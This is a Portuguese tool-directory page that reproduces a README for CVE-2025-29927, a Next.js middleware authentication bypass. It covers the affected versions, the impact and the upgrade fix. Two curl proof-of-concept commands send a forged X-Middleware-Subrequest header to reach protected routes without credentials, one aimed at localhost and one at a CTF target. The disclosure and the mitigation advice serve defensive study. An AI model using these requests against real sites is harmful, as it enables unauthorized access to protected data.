Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-29927 — Exploit de prova de conceito para CVE-2025-29927, demonstrando bypass de autenticação no middleware Next.js via cabeçalho x-middleware-subrequest, com versões afetadas e orientações de mitigação. | Kitploit
Ferramentas/GitHubGitHub/toddkk02/cve-2025-29927
Autenticação e AutorizaçãoAnálise de VulnerabilidadesEvasão de IDS/IPSExploração de Aplicações WebCTFTestes de Penetração
GitHubtoddkk02/cve-2025-29927

CVE-2025-29927

Exploit de prova de conceito para CVE-2025-29927, demonstrando bypass de autenticação no middleware Next.js via cabeçalho x-middleware-subrequest, com versões afetadas e orientações de mitigação.

Ver Repositório
2há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-29927 — Desvio de Autenticação no Middleware do Next.js

Visão Geral

Imagine um porteiro na frente da boate, mas se você disser “Já estou dentro”, ele deixa passar sem verificar. É exatamente isso que é o CVE-2025-29927.

O middleware no Next.js é executado antes de uma requisição ser processada, tornando-o o local ideal para lidar com autenticação. O Next.js usa um cabeçalho interno x-middleware-subrequest para evitar requisições recursivas e loops infinitos. Esta vulnerabilidade demonstra que é possível ignorar ou pular completamente a execução do middleware — incluindo verificações críticas de segurança, como autenticação, antes de chegar a uma rota protegida.


Versões Afetadas

RamificaçãoCorrigido em
15.x< 15.2.3
14.x< 14.2.25
13.x< 13.5.9

Aplicações vulneráveis

  • Aplicações que hospedam Next.js e usam middleware
  • Aplicações que dependem de middleware para autenticação e verificações de segurança sem validação posterior na pilha da aplicação

Não afetadas

  • Aplicações hospedadas na Vercel
  • Aplicações hospedadas na Netlify
  • Aplicações publicadas como exportações estáticas (o middleware não é executado)

Impacto

Milhares ou milhões de aplicações rodam em versões não corrigidas do Next.js. Se não mitigada, esta vulnerabilidade permite acesso não autenticado a rotas protegidas por qualquer pessoa — sem necessidade de credenciais.


Prova de Conceito

root@kitploit:~
curl -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware" \
  http://localhost:3000/private-area

A resposta retorna a página protegida sem nenhuma autenticação.

Explorei esta vulnerabilidade em um ambiente CTF real

root@kitploit:~
curl -s "http://<target>/<private-area>" \
  -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware"

Correção

Atualize o Next.js para uma versão corrigida:

  • 15.x → 15.2.3 ou superior
  • 14.x → 14.2.25 ou superior
  • 13.x → 13.5.9 ou superior
Baixar ferramenta